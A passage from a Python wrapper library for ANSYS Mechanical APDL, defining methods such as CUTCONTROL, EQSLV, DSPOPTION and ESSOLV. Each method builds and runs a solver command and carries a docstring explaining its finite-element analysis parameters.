"""Redirects contact pair output quantities to a text file.
APDL Command: CNTR
Parameters
----------
option
Output option:
OUT - Contact output control.
key
Control key:
NO - Write contact information to the output file or to the screen (default).
YES - Write contact information to the Jobname.CNM file.
Notes
-----
Issue the command CNTR,OUT,YES to redirect contact pair output
quantities to the Jobname.CNM file.
To ensure that the contact information is written to Jobname.CNM,
reissue CNTR,OUT,YES each time you reenter the solution processor
(/SOLU).
"""
command = f"CNTR,{option},{key}"
return self.run(command, **kwargs)
def cutcontrol(self, lab="", value="", option="", **kwargs):
"""Controls time-step cutback during a nonlinear solution.
APDL Command: CUTCONTROL
Parameters
----------
lab
Specifies the criteria for causing a cutback. Valid labels are:
PLSLIMIT - Maximum equivalent plastic strain allowed within a time-step (substep). If the
calculated value exceeds the VALUE, the program
performs a cutback (bisection). VALUE defaults to 0.15
(15%).
CRPLIMIT - Set values for calculating the maximum equivalent creep ratio allowed within a
time step. If the calculated maximum creep ratio
exceeds the defined creep ratio limit, the program
performs a cutback.
DSPLIMIT - Maximum incremental displacement within the solution field in a time step
(substep). If the maximum calculated value exceeds
VALUE, the program performs a cutback (bisection).
VALUE defaults to 1.0 x 107.
NPOINT - Number of points in a cycle for a second order dynamic equation, used to
control automatic time stepping. If the number of
solution points per cycle is less than VALUE, the program
performs a cutback in time step size. VALUE defaults to
13 for linear analysis, 5 for nonlinear analysis. A
larger number of points yields a more accurate solution
but also increases the solution run time.
This option works well for linear problems. For nonlinear analyses, other factors such as contact status changes and solution convergence rate can overwrite NPOINT. See Automatic Time Stepping in the Mechanical APDL Theory Reference for more information on automatic time stepping. - NOITERPREDICT
If VALUE is 0 (default), an internal auto time step scheme will predict the number of iterations for nonlinear convergence and perform a cutback earlier than the number of iterations specified by the NEQIT command. This is the recommended option. If VALUE is 1, the solution will iterate (if nonconvergent) to NEQIT number of iterations before a cutback is invoked. It is sometimes useful for poorly-convergent problems, but rarely needed in general. - Bisection is also controlled by contact status change, plasticity or creep
strain limit, and other factors. If any of these
factors occur, bisection will still take place,
regardless of the NOITERPREDICT setting.
CUTBACKFACTOR - Changes the cutback value for bisection. Default is 0.5. VALUE must be greater
than 0.0 and less than 1.0. This option is active
only if AUTOTS,ON is set.
value
Numeric value for the specified cutback criterion. For Lab =
CRPLIMIT, VALUE is the creep criteria for the creep ratio limit.
option
Type of creep analysis. Valid for Lab = CRPLIMIT only.
IMPRATIO - Set the maximum creep ratio value for implicit creep. The default is 0.0 (i.e.,
no creep limit control) and any positive value is
valid. (See Implicit Creep Procedure in the Structural
Analysis Guide for information on how to define
implicit creep.)
EXPRATIO - Set the maximum creep ratio value for explicit creep. The default value is 0.1
and any positive value up to 0.25 is allowed. (See
Explicit Creep Procedure in the Structural Analysis
Guide for information on how to define explicit
creep.)
STSLIMIT - Stress threshold for calculating the creep ratio. For integration points with
effective stress below this threshold, the creep ratio
does not cause cutback. The default value is 0.0 and
any positive value is valid.
STNLIMIT - Elastic strain threshold for calculating the creep ratio. For integration
points with effective elastic strain below this
threshold, the creep ratio does not cause cutback. The
default value is 0.0 and any positive value is valid.
Notes
-----
A cutback is a method for automatically reducing the step size when
either the solution error is too large or the solution encounters
convergence difficulties during a nonlinear analysis.
Should a convergence failure occur, the program reduces the time step
interval to a fraction of its previous size and automatically continues
the solution from the last successfully converged time step. If the
reduced time step again fails to converge, the program again reduces
the time step size and proceeds with the solution. This process
continues until convergence is achieved or the minimum specified time
step value is reached.
For creep analysis, the cutback procedure is similar; the process
continues until the minimum specified time step size is reached.
However, if the creep ratio limit is exceeded, the program issues a
warning but continues the substep until the analysis is complete. In
this case, convergence is achieved but the creep ratio criteria is not
satisfied.
The CRPLIM command is functionally equivalent to Lab = CRPLIMIT with
options IMPRATIO and EXPRATIO
"""
command = f"CUTCONTROL,{lab},{value},{option}"
return self.run(command, **kwargs)
def ddoption(self, decomp="", **kwargs):
"""Sets domain decomposer option for Distributed ANSYS.
APDL Command: DDOPTION
Parameters
----------
decomp
Controls which domain decomposition algorithm to use.
AUTO - Use the default domain decomposition algorithm when splitting the model into
domains for Distributed ANSYS (default).
GREEDY - Use the "greedy" domain decomposition algorithm.
METIS - Use the METIS graph partitioning domain decomposition algorithm.
Notes
-----
This command controls options relating to the domain decomposition
algorithm used by Distributed ANSYS to split the model into pieces (or
domains), with each piece being solved on a different processor.
The greedy domain decomposition algorithm starts from a single element
at a corner of the model. The domain grows by taking the properly
connected neighboring elements and stops after reaching the optimal
size.
The METIS domain decomposition algorithm starts by creating a graph
from the finite element mesh. It then uses a multilevel graph
partitioning scheme which reduces the size of the original graph,
creates domains using the reduced graph, and then creates the final CPU
domains by expanding the smaller domains from the reduced graph back to
the original mesh.
"""
command = f"DDOPTION,{decomp}"
return self.run(command, **kwargs)
def dmpext(
self, smode="", tmode="", dmpname="", freqb="", freqe="", nsteps="", **kwargs
):
"""Extracts modal damping coefficients in a specified frequency range.
APDL Command: DMPEXT
Parameters
----------
smode
Source mode number. There is no default for this field; you must
enter an integer greater than zero.
tmode
Target mode. Defaults to SMODE.
dmpname
Array parameter name containing the damping results. Defaults to
d_damp.
freqb
Beginning frequency range (real number greater than zero) or 'EIG'
at eigenfrequency of source mode. 'EIG' is valid only if SMODE =
TMODE. Note that EIG must be enclosed in single quotes when this
command is used on the command line or in an input file. There is
no default for this field; you must enter a value.
freqe
End of frequency range. Must be blank for Freqb = EIG. Default is
Freqb.
nsteps
Number of substeps. Defaults to 1.
Notes
-----
DMPEXT invokes an ANSYS macro that uses modal projection techniques to
compute the damping force by the modal velocity of the source mode onto
the target mode. From the damping force, damping parameters are
extracted. DMPEXT creates an array parameter Dmpname, with the
following entries in each row:
response frequency
modal damping coefficient
modal squeeze stiffness coefficient
damping ratio
squeeze-to-structural stiffness ratio
The macro requires the modal displacements from the file Jobname.EFL
obtained from the RMFLVEC command. In addition, a node component FLUN
must exist from all FLUID136 nodes. The computed damping ratio may be
used to specify constant or modal damping by means of the DMPRAT or
MDAMP commands. For Rayleigh damping, use the ABEXTRACT command to
compute ALPHAD and BETAD damping parameters. See Thin Film Analysis for
more information on thin film analyses.
The macro uses the LSSOLVE command to perform two load steps for each
frequency. The first load case contains the solution of the source
mode excitation and can be used for further postprocessing. Solid model
boundary conditions are deleted from the model. In addition,
prescribed nodal boundary conditions are applied to the model. You
should carefully check the boundary conditions of your model prior to
executing a subsequent analysis.
This command is also valid in PREP7.
Distributed ANSYS Restriction: This command is not supported in
Distributed ANSYS.
"""
command = f"DMPEXT,{smode},{tmode},{dmpname},{freqb},{freqe},{nsteps}"
return self.run(command, **kwargs)
def dmpoption(self, filetype="", combine="", **kwargs):
"""Specifies distributed memory parallel (Distributed ANSYS) file
APDL Command: DMPOPTION
combination options.
Parameters
----------
filetype
Type of solution file to combine after a distributed memory
parallel solution. There is no default; if (blank), the command is
ignored.
RST - Results files (.RST, .RTH, .RMG, .RSTP)
EMAT - Element matrix files (.EMAT).
ESAV - Element saved data files (.ESAVE)
MODE - Modal results files (.MODE)
MLV - Modal load vector file (.MLV)
IST - Initial state file (.IST)
FULL - Full matrix file (.FULL)
RFRQ - Reduced complex displacement file (.RFRQ)
RDSP - Reduced displacement file (.RDSP)
combine
Option to combine solution files.
Yes - Combine solution files (default).
No - Do not combine solution files.
Notes
-----
The DMPOPTION command controls how solution files are written during a
distributed memory parallel (Distributed ANSYS) solution. This command
is most useful for controlling how results files (.RST,.RTH, etc.) are
written.
In a distributed memory parallel solution, a local results file is
written by each process (JobnameN.ext, where N is the process number).
By default, the program automatically combines the local results files
(for example, JobnameN.RST) upon leaving the SOLUTION processor (for
example, upon the FINISH command) into a single global results file
(Jobname.RST) which can be used in ANSYS postprocessing. To reduce the
amount of communication and I/O performed by this operation, you can
issue the command DMPOPTION,RST,NO to bypass this step of combining the
local results files; the local files will remain on the local disks in
the current working directory. You can then use the RESCOMBINE command
macro in the POST1 general postprocessor (/POST1) to read all results
into the database for postprocessing.
The RESCOMBINE command macro is intended for use with POST1. If you
want to postprocess distributed parallel solution results using the
POST26 time-history postprocessor (/POST26), it is recommended that you
combine your local results files into one global results file
(DMPOPTION,RST,YES or COMBINE).
Local .EMAT, .ESAV, .MODE, .MLV, .IST, .RFRQ, .RDSP, and .FULL files
are also written (when applicable) by each process in a distributed
memory parallel solution. If these files are not needed for a
downstream solution or operation, you can issue the command
DMPOPTION,FileType,NO for each file type to bypass the file combination
step and thereby improve performance. You should not bypass the file
combination step if a downstream PSD analysis or modal expansion pass
will be performed.
If DMPOPTION,MODE,NO or DMPOPTION,RST,NO is specified in a modal
analysis, element results cannot be written to the combined mode file
(Jobname.MODE). In this case, if Distributed ANSYS is used in a
downstream harmonic or transient analysis that uses the mode-
superposition method, the MSUPkey on the MXPAND command can retain its
value. However, if shared memory parallel processing is used in the
downstream harmonic or transient analysis, the MSUPkey is effectively
set to NO.
The DMPOPTION command can be changed between load steps; however, doing
so will not affect which set of solution files are combined. Only the
last values of FileType and Combine upon leaving the solution processor
will be used to determine whether the solution files are combined. For
example, given a two load step solution and FileType = RST, setting
Combine = NO for the first load step and YES for the second load step
will cause all sets on the local results files to be combined. If the
opposite is true (Combine = YES for the first load step and NO for the
second load step), no results will be combined.
After using DMPOPTION to suppress file combination, you may find it
necessary to combine the local files for a specific FileType for use in
a subsequent analysis. In this case, use the COMBINE command to combine
local solution files into a single, global file.
"""
command = f"DMPOPTION,{filetype},{combine}"
return self.run(command, **kwargs)
def dspoption(
self, reord_option="", memory_option="", memory_size="", solve_info="", **kwargs
):
"""Sets memory option for the distributed sparse solver.
APDL Command: DSPOPTION
Parameters
----------
reord_option
Reordering option:
DEFAULT - Use the default reordering scheme.
SEQORDER - Use a sequential equation reordering scheme
within the distributed sparse solver. Relative
to PARORDER, this option typically results in
longer equation ordering times and therefore
longer overall solver times. Occasionally,
however, this option will produce better
quality orderings which decrease the matrix
factorization times and improve overall solver
performance.
PARORDER - Use a parallel equation reordering scheme
within the distributed sparse solver. Relative
to SEQORDER, this option typically results in
shorter equation ordering times and therefore
shorter overall solver times. Occasionally,
however, this option will produce lower quality
orderings which increase the matrix
factorization times and degrade overall solver
performance.
memory_option
Memory allocation option:
DEFAULT - Use the default memory allocation strategy for
the distributed sparse solver. The default
strategy attempts to run in the INCORE memory
mode. If there is not enough physical memory
available when the solver starts to run in the
INCORE memory mode, the solver will then attempt
to run in the OUTOFCORE memory mode.
INCORE - Use a memory allocation strategy in the
distributed sparse solver that will attempt to
obtain enough memory to run with the entire
factorized matrix in memory. This option uses the
most amount of memory and should avoid doing any
I/O. By avoiding I/O, this option achieves
optimal solver performance. However, a
significant amount of memory is required to run
in this mode, and it is only recommended on
machines with a large amount of memory. If the
allocation for in-core memory fails, the solver
will automatically revert to out-of-core memory
mode.
OUTOFCORE - Use a memory allocation strategy in the
distributed sparse solver that will attempt to
allocate only enough work space to factor each
individual frontal matrix in memory, but will
share the entire factorized matrix on
disk. Typically, this memory mode results in
poor performance due to the potential
bottleneck caused by the I/O to the various
files written by the solver.
FORCE - This option, when used in conjunction with the
Memory_Size option, allows you to force the
distributed sparse solver to run with a specific
amount of memory. This option is only recommended
for the advanced user who understands distributed
sparse solver memory requirements for the problem
being solved, understands the physical memory on
the system, and wants to control the distributed
sparse solver memory usage.
memory_size
Initial memory size allocation for the sparse solver in
MB. The Memory_Size setting should always be well within
the physical memory available, but not so small as to
cause the distributed sparse solver to run out of
memory. Warnings and/or errors from the distributed sparse
solver will appear if this value is set too low. If the
FORCE memory option is used, this value is the amount of
memory allocated for the entire duration of the
distributed sparse solver solution.
solve_info
Solver output option:
OFF - Turns off additional output printing from the
distributed sparse solver (default).
PERFORMANCE - Turns on additional output printing from the
distributed sparse solver, including a
performance summary and a summary of file
I/O for the distributed sparse
solver. Information on memory usage during
assembly of the global matrix (that is,
creation of the Jobname.FULL file) is also
printed with this option.
Notes
-----
This command controls options related to the distributed sparse solver
in all analysis types where the distributed sparse solver can be used.
The amount of memory required for the distributed sparse solver is
unknown until the matrix structure is preprocessed, including equation
reordering. The amount of memory allocated for the distributed sparse
solver is then dynamically adjusted to supply the solver what it needs
to compute the solution.
If you have a large memory system, you may want to try selecting the
INCORE memory mode for larger jobs to improve performance. Also, when
running the distributed sparse solver with many processors on the same
machine or on a machine with very slow I/O performance (e.g., slow hard
drive speed), you may want to try using the INCORE memory mode to
achieve better performance. However, doing so may require much more
memory compared to running in the OUTOFCORE memory mode.
Running with the INCORE memory mode is best for jobs which comfortably
fit within the limits of the physical memory on a given system. If the
distributed sparse solver workspace exceeds physical memory size, the
system will be forced to use virtual memory (or the system page/swap
file). In this case, it is typically more efficient to run with the
OUTOFCORE memory mode.
"""
command = (
f"DSPOPTION,{reord_option},{memory_option},{memory_size},,,{solve_info}"
)
return self.run(command, **kwargs)
def exbopt(
self,
outinv2="",
outtcms="",
outsub="",
outcms="",
outcomp="",
outrm="",
noinv="",
outele="",
**kwargs,
):
"""Specifies .EXB file output options in a CMS generation pass.
APDL Command: EXBOPT
Parameters
----------
outinv2
Output control for 2nd order invariant:
* ``"0"`` : Do not output (default).
* ``"1"`` : Output the second order invariant.
outtcms
Output control for .TCMS file:
* ``"0"`` : Do not output (default).
* ``"1"`` : Output the .TCMS file.
outsub
Output control for .SUB file:
* ``"0"`` : Do not output (default).
* ``"1"`` : Output the .SUB file.
OUTCMS
Output control for .CMS file:
* ``"0"`` : Do not output (default).
* ``"1"`` : Output the .CMS file.
outcomp
Output control for node and element component information:
* ``"0"`` : Do not output any component information.
* ``"1"`` : Output node component information only.
* ``"2"`` : Output element component information only.
* ``"3"`` : Output both node and element component information (default).
outrm
Output control for the recovery matrix:
* ``"0"`` : Do not output (default).
* ``"1"`` : Output the recovery matrix to file.EXB.
* ``"2"`` : Output the recovery matrix to a separate file, file_RECOVER.EXB.
noinv
Invariant calculation:
* ``"0"`` : Calculate all invariants (default).
* ``"1"`` : Suppress calculation of the 1st and 2nd order
invariants. NOINV = 1 suppresses OUTINV2 = 1.
OUTELE
Output control for the element data:
* ``"0"`` : Do not output (default).
* ``"1"`` : Output the element data.
Notes
-----
When the body property file (file.EXB) is requested in a CMS
generation pass (CMSOPT,,,,,,,EXB command), the .TCMS, .SUB, and
.CMS files are not output by default. Use the EXBOPT command to
request these files, as needed.
EXBOPT can also be used to manage some content in the .EXB file
for improving performance and storage (see the OUTINV2, OUTCOMP,
OUTRM, NOINV, and OUTELE arguments described above).
If both recovery matrix output (OUTRM = 1 or 2) and the .TCMS file
(OUTTCMS = 1) are requested, the .TCMS file writing is turned off
due to potentially large in-core memory use.
For more information on how to generate file.EXB, see ANSYS
Interface to AVL EXCITE in the Mechanical APDL Substructuring
Analysis Guide
"""
command = f"EXBOPT,{outinv2},{outtcms},{outsub},{outcms},{outcomp},{outrm},{noinv},{outele}"
return self.run(command, **kwargs)
def ematwrite(self, key: str = "", **kwargs) -> Optional[str]:
"""Forces the writing of all the element matrices to File.EMAT.
APDL Command: EMATWRITE
Parameters
----------
key
Write key:
YES - Forces the writing of the element matrices to
File.EMAT even if not normally
done.
NO - Element matrices are written only if required. This
value is the default.
Notes
-----
The EMATWRITE command forces ANSYS to write the File.EMAT
file. The file is necessary if you intend to follow the
initial load step with a subsequent inertia relief
calculation (IRLF). If used in the solution
processor (/SOLU), this command is only valid within the
first load step.
This command is also valid in PREP7.
"""
command = f"EMATWRITE,{key}"
return self.run(command, **kwargs)
def eqslv(self, lab="", toler="", mult="", keepfile="", **kwargs):
"""Specifies the type of equation solver.
APDL Command: EQSLV
Parameters
----------
lab
Equation solver type:
SPARSE - Sparse direct equation solver. Applicable to
real-value or complex-value symmetric and
unsymmetric matrices. Available only for STATIC,
HARMIC (full method only), TRANS (full method
only), SUBSTR, and PSD spectrum analysis types
[ANTYPE]. Can be used for nonlinear and linear
analyses, especially nonlinear analysis where
indefinite matrices are frequently
encountered. Well suited for contact analysis
where contact status alters the mesh
topology. Other typical well-suited applications
are: (a) models consisting of shell/beam or
shell/beam and solid elements (b) models with a
multi-branch structure, such as an automobile
exhaust or a turbine fan. This is an alternative
to iterative solvers since it combines both speed
and robustness. Generally, it requires
considerably more memory (~10x) than the PCG
solver to obtain optimal performance (running
totally in-core). When memory is limited, the
solver works partly in-core and out-of-core,
which can noticeably slow down the performance of
the solver. See the BCSOPTION command for more
details on the various modes of operation for
this solver.
This solver can be run in shared memory parallel or
distributed memory parallel (Distributed ANSYS) mode. When
used in Distributed ANSYS, this solver preserves all of
the merits of the classic or shared memory sparse
solver. The total sum of memory (summed for all processes)
is usually higher than the shared memory sparse
solver. System configuration also affects the performance
of the distributed memory parallel solver. If enough
physical memory is available, running this solver in the
in-core memory mode achieves optimal performance. The
ideal configuration when using the out-of-core memory mode
is to use one processor per machine on multiple machines
(a cluster), spreading the I/O across the hard drives of
each machine, assuming that you are using a high-speed
network such as Infiniband to efficiently support all
communication across the multiple machines. - This solver
supports use of the GPU accelerator capability.
JCG - Jacobi Conjugate Gradient iterative equation
solver. Available only for STATIC, HARMIC (full
method only), and TRANS (full method only) analysis
types [ANTYPE]. Can be used for structural, thermal,
and multiphysics applications. Applicable for
symmetric, unsymmetric, complex, definite, and
indefinite matrices. Recommended for 3-D harmonic
analyses in structural and multiphysics
applications. Efficient for heat transfer,
electromagnetics, piezoelectrics, and acoustic field
problems.
This solver can be run in shared memory parallel or
distributed memory parallel (Distributed ANSYS) mode. When
used in Distributed ANSYS, in addition to the limitations
listed above, this solver only runs in a distributed
parallel fashion for STATIC and TRANS (full method)
analyses in which the stiffness is symmetric and only when
not using the fast thermal option (THOPT). Otherwise, this
solver runs in shared memory parallel mode inside
Distributed ANSYS. - This solver supports use of the GPU
accelerator capability. When using the GPU accelerator
capability, in addition to the limitations listed above,
this solver is available only for STATIC and TRANS (full
method) analyses where the stiffness is symmetric and does
not support the fast thermal option (THOPT).
ICCG - Incomplete Cholesky Conjugate Gradient iterative
equation solver. Available for STATIC, HARMIC (full
method only), and TRANS (full method only) analysis
types [ANTYPE]. Can be used for structural,
thermal, and multiphysics applications, and for
symmetric, unsymmetric, complex, definite, and
indefinite matrices. The ICCG solver requires more
memory than the JCG solver, but is more robust than
the JCG solver for ill-conditioned matrices.
This solver can only be run in shared memory parallel
mode. This is also true when the solver is used inside
Distributed ANSYS. - This solver does not support use of
the GPU accelerator capability.
QMR - Quasi-Minimal Residual iterative equation
solver. Available for the HARMIC (full method only)
analysis type [ANTYPE]. Can be used for
high-frequency electromagnetic applications, and for
symmetric, complex, definite, and indefinite
matrices. The QMR solver is more stable than the
ICCG solver.
This solver can only be run in shared memory parallel
mode. This is also true when the solver is used inside
Distributed ANSYS. - This solver does not support use of
the GPU accelerator capability.
PCG - Preconditioned Conjugate Gradient iterative equation
solver (licensed from Computational Applications and
Systems Integration, Inc.). Requires less disk file
space than SPARSE and is faster for large
models. Useful for plates, shells, 3-D models, large
2-D models, and other problems having symmetric,
sparse, definite or indefinite matrices for
nonlinear analysis. Requires twice as much memory
as JCG. Available only for analysis types [ANTYPE]
STATIC, TRANS (full method only), or MODAL (with PCG
Lanczos option only). Also available for the use
pass of substructure analyses (MATRIX50). The PCG
solver can robustly solve equations with constraint
equations (CE, CEINTF, CPINTF, and CERIG). With
this solver, you can use the MSAVE command to obtain
a considerable memory savings.
The PCG solver can handle ill-conditioned problems by
using a higher level of difficulty (see
PCGOPT). Ill-conditioning arises from elements with high
aspect ratios, contact, and plasticity. - This solver can
be run in shared memory parallel or distributed memory
parallel (Distributed ANSYS) mode. When used in
Distributed ANSYS, this solver preserves all of the merits
of the classic or shared memory PCG solver. The total sum
of memory (summed for all processes) is about 30% more
than the shared memory PCG solver.
toler
Iterative solver tolerance value. Used only with the
Jacobi Conjugate Gradient, Incomplete Cholesky Conjugate
Gradient, Pre- conditioned Conjugate Gradient, and
Quasi-Minimal Residual equation solvers. For the PCG
solver, the default is 1.0E-8. The value 1.0E-5 may be
acceptable in many situations. When using the PCG Lanczos
mode extraction method, the default solver tolerance value
is 1.0E-4. For the JCG and ICCG solvers with symmetric
matrices, the default is 1.0E-8. For the JCG and ICCG
solvers with unsymmetric matrices, and for the QMR solver,
the default is 1.0E-6. Iterations continue until the SRSS
norm of the residual is less than TOLER times the norm of
the applied load vector. For the PCG solver in the linear
static analysis case, 3 error norms are used. If one of
the error norms is smaller than TOLER, and the SRSS norm
of the residual is smaller than 1.0E-2, convergence is
assumed to have been reached. See Iterative Solver in the
Mechanical APDL Theory Reference for details.
mult
Multiplier (defaults to 2.5 for nonlinear analyses; 1.0
for linear analyses) used to control the maximum number of
iterations performed during convergence calculations. Used
only with the Pre- conditioned Conjugate Gradient equation
solver (PCG). The maximum number of iterations is equal to
the multiplier (MULT) times the number of degrees of
freedom (DOF). If MULT is input as a negative value, then
the maximum number of iterations is equal to abs(MULT).
Iterations continue until either the maximum number of
iterations or solution convergence has been reached. In
general, the default value for MULT is adequate for
reaching convergence. However, for ill-conditioned
matrices (that is, models containing elements with high
aspect ratios or material type discontinuities) the
multiplier may be used to increase the maximum number of
iterations used to achieve convergence. The recommended
range for the multiplier is 1.0 MULT 3.0. Normally, a
value greater than 3.0 adds no further benefit toward
convergence, and merely increases time requirements. If
the solution does not converge with 1.0 MULT 3.0, or in
less than 10,000 iterations, then convergence is highly
unlikely and further examination of the model is
recommended. Rather than increasing the default value of
MULT, consider increasing the level of difficulty
(Lev_Diff) on the PCGOPT command.
keepfile
Determines whether files from a SPARSE solver run should be deleted
or retained. Applies only to Lab = SPARSE for static and full
transient analyses.
"""
return self.run(f"EQSLV,{lab},{toler},{mult},,{keepfile}", **kwargs)
def eresx(self, key="", **kwargs):
"""Specifies extrapolation of integration point results.
APDL Command: ERESX
Parameters
----------
key
Extrapolation key:
DEFA - If element is fully elastic (no active plasticity, creep, or swelling
nonlinearities), extrapolate the integration point results
to the nodes. If any portion of the element is plastic (or
other active material nonlinearity), copy the integration
point results to the nodes (default).
YES - Extrapolate the linear portion of the integration point results to the nodes
and copy the nonlinear portion (for example, plastic
strains).
NO - Copy the integration point results to the nodes.
Notes
-----
Specifies whether the solution results at the element integration
points are extrapolated or copied to the nodes for element and nodal
postprocessing. The structural stresses, elastic and thermal strains,
field gradients, and fluxes are affected. Nonlinear data (plastic,
creep, and swelling strains) are always copied to the nodes, never
extrapolated. For shell elements, ERESX applies only to integration
point results in the in-plane directions.
This command is also valid in PREP7.
"""
command = f"ERESX,{key}"
return self.run(command, **kwargs)
def escheck(
self, sele: str = "", levl: str = "", defkey: MapdlInt = "", **kwargs
) -> Optional[str]:
"""Perform element shape checking for a selected element set.
APDL Command: ESCHECK
Parameters
----------
sele
Specifies whether to select elements for checking:
(blank) - List all warnings/errors from element shape
checking.
ESEL - Select the elements based on the .Levl criteria
specified below.
levl
WARN - Select elements producing warning and error messages.
ERR - Select only elements producing error messages (
default).
defkey
Specifies whether check should be performed on deformed
element
shapes. .
0 - Do not update node coordinates before performing
shape checks (default).
1 - Update node coordinates using the current set of
deformations in the database.
Notes
-----
Shape checking will occur according to the current SHPP
settings. Although ESCHECK is valid in all processors,
Defkey uses the current results in the database. If no
results are available a warning will be issued.
This command is also valid in PREP7, SOLUTION and POST1.
"""
command = f"ESCHECK,{sele},{levl},{defkey}"
return self.run(command, **kwargs)
def essolv(
self,
electit="",
strutit="",
dimn="",
morphopt="",
mcomp="",
xcomp="",
electol="",
strutol="",
mxloop="",
ruseky="",
restky="",
eiscomp="",
**kwargs,
):
"""Performs a coupled electrostatic-structural analysis.
APDL Command: ESSOLV
Parameters
----------
electit
Title of the electrostatics physics file as assigned by the PHYSICS
command.
strutit
Title of the structural physics file as assigned by the PHYSICS
command.
dimn
Model dimensionality (a default is not allowed):
2 - 2-D model.
3 - 3-D model.
morphopt
Morphing option:
<0 - Do not perform any mesh morphing or remeshing.
0 - Remesh the non-structural regions for each recursive loop only if mesh morphing
fails (default).
1 - Remesh the non-structural regions each recursive loop and bypass mesh morphing.
2 - Perform mesh morphing only, do not remesh any non-structural regions.
mcomp
Component name of the region to be morphed. For 2-D models, the
component may be elements or areas. For 3-D models, the component
may be elements or volumes. A component must be specified. You
must enclose name-strings in single quotes in the ESSOLV command
line.
xcomp
Component name of entities excluded from morphing. In the 2-D
case, it is the component name for the lines excluded from
morphing. In the 3-D case, it is component name for the areas
excluded from morphing. Defaults to exterior non-shared entities
(see the DAMORPH, DVMORPH, and DEMORPH commands). You must enclose
name-strings in single quotes in the ESSOLV command line.
electol
Electrostatic energy convergence tolerance. Defaults to .005 (.5%)
of the value computed from the previous iteration. If less than
zero, the convergence criteria based on electrostatics results is
turned off.
strutol
Structural maximum displacement convergence tolerance. Defaults to
.005 (.5%) of the value computed from the previous iteration. If
less than zero, the convergence criteria base on structural results
is turned off.
mxloop
Maximum number of allowable solution recursive loops. A single
pass through both an electrostatics and structural analysis
constitutes one loop. Defaults to 100.
ruseky
Reuse flag option:
1 - Assumes initial run of ESSOLV using base geometry for
the first electrostatics solution.
>1 - Assumes ESSOLV run is a continuation of a previous
ESSOLV run, whereby the morphed geometry is used for
the initial electrostatic simulation.
restky
Structural restart key.
0 - Use static solution option for structural solution.
1 - Use static restart solution option for structural solution.
eiscomp
Element component name for elements containing initial stress data
residing in file jobname.ist. The initial stress data must be
defined prior to issuing ESSOLV (see INISTATE command).
Notes
-----
ESSOLV invokes an ANSYS macro which automatically performs a coupled
electrostatic-structural analysis.
The macro displays periodic updates of the convergence.
If non-structural regions are remeshed during the analysis, boundary
conditions and loads applied to nodes and elements will be lost.
Accordingly, it is better to assign boundary conditions and loads to
the solid model.
Use RUSEKY > 1 for solving multiple ESSOLV simulations for different
excitation levels (i.e., for running a voltage sweep). Do not issue the
SAVE command to save the database between ESSOLV calls.
For nonlinear structural solutions, the structural restart option
(RESTKY = 1) may improve solution time by starting from the previous
converged structural solution.
For solid elements, ESSOLV automatically detects the air-structure
interface and applies a Maxwell surface flag on the electrostatic
elements. This flag is used to initiate the transfer for forces from
the electrostatic region to the structure. When using the ESSOLV
command with structural shell elements (for example, SHELL181), you
must manually apply the Maxwell surface flag on all air elements
surrounding the shells before writing the final electrostatic physics
file. Use the SFA command to apply the Maxwell surface flag to the
areas representing the shell elements; doing so ensures that the air
elements next to both sides of the shells receive the Maxwell surface
flag.
If lower-order structural solids or shells are used, set KEYOPT(7) = 1
for the electrostatic element types to ensure the correct transfer of
forces.
Information on creating the initial stress file is documented in the
Loading chapter in the Basic Analysis Guide.
Distributed ANSYS Restriction: This command is not supported in
Distributed ANSYS.
"""
command = f"ESSOLV,{electit},{strutit},{dimn},{morphopt},{mcomp},{xcomp},{electol},{strutol},{mxloop},,{ruseky},{restky},{eiscomp}"
return self.run(command, **kwargs)
def expass(self, key="", **kwargs):
"""Specifies an expansion pass of an analysis.
APDL Command: EXPASS
Parameters
----------
key
Expansion pass key:
OFF - No expansion pass will be performed (default).
ON - An expansion pass will be performed.
Notes
-----
Specifies that an expansion pass of a modal, substructure, buckling,
transient, or harmonic analysis is to be performed.
Note:: : This separate solution pass requires an explicit FINISH to
preceding analysis and reentry into SOLUTION.
This command is also valid in PREP7.
"""
command = f"EXPASS,{key}"
return self.run(command, **kwargs)
def gauge(self, opt="", freq="", **kwargs):
"""Gauges the problem domain for a magnetic edge-element formulation.
APDL Command: GAUGE
Parameters
----------
opt
Type of gauging to be performed:
ON - Perform tree gauging of the edge values (default).
OFF - Gauging is off. (You must specify custom gauging via APDL specifications.)
STAT - Gauging status (returns the current Opt and FREQ values)
freq
The following options are valid when Opt = ON:
0 - Generate tree-gauging information once, at the first load step. Gauging data is
retained for subsequent load steps. (This behavior is the
default.)
1 - Repeat gauging for each load step. Rewrites the gauging information at each
load step to accommodate changing boundary conditions on the AZ
degree of freedom (for example, adding or deleting AZ
constraints via the D or CE commands).
Notes
-----
The GAUGE command controls the tree-gauging procedure required for
electromagnetic analyses using an edge-based magnetic formulation
(elements SOLID236 and SOLID237).
Gauging occurs at the solver level for each solution (SOLVE). It sets
additional zero constraints on the edge-flux degrees of freedom AZ to
produce a unique solution; the additional constraints are removed after
solution.
Use the FREQ option to specify how the command generates gauging
information for multiple load steps.
Access the gauging information via the _TGAUGE component of gauged
nodes. The program creates and uses this component internally to remove
and reapply the AZ constraints required by gauging. If FREQ = 0, the
_TGAUGE component is created at the first load step and is used to
reapply the tree gauge constraints at subsequent load steps. If FREQ =
1, the tree-gauging information and the _TGAUGE component are generated
at every load step
If gauging is turned off (GAUGE,OFF), you must specify your own gauging
at the APDL level.
This command is also valid in PREP7.
"""
command = f"GAUGE,{opt},{freq}"
return self.run(command, **kwargs)
def gmatrix(self, symfac="", condname="", numcond="", matrixname="", **kwargs):
"""Performs electric field solutions and calculates the self and mutual
APDL Command: GMATRIX
conductance between multiple conductors.
Parameters
----------
symfac
Geometric symmetry factor. Conductance values are scaled by this
factor which represents the fraction of the total device modeled.
Defaults to 1.
condname
Alphanumeric prefix identifier used in defining named conductor
components.
numcond
Total number of components. If a ground is modeled, it is to be
included as a component.
matrixname
Array name for computed conductance matrix. Defaults to GMATRIX.
Notes
-----
To invoke the GMATRIX macro, the exterior nodes of each conductor must
be grouped into individual components using the CM command. Each set
of independent components is assigned a component name with a common
prefix followed by the conductor number. A conductor system with a
ground must also include the ground nodes as a component. The ground
component is numbered last in the component name sequence.
A ground conductance matrix relates current to a voltage vector. A
ground matrix cannot be applied to a circuit modeler. The lumped
conductance matrix is a combination of lumped "arrangements" of
voltage differences between conductors. Use the lumped conductance
terms in a circuit modeler to represent conductances between
conductors.
Enclose all name-strings in single quotes in the GMATRIX command line.
GMATRIX works with the following elements:
SOLID5 (KEYOPT(1) = 9)
SOLID98 (KEYOPT(1) = 9)
LINK68
PLANE230
SOLID231
SOLID232
This command is available from the menu path shown below only if
existing results are available.
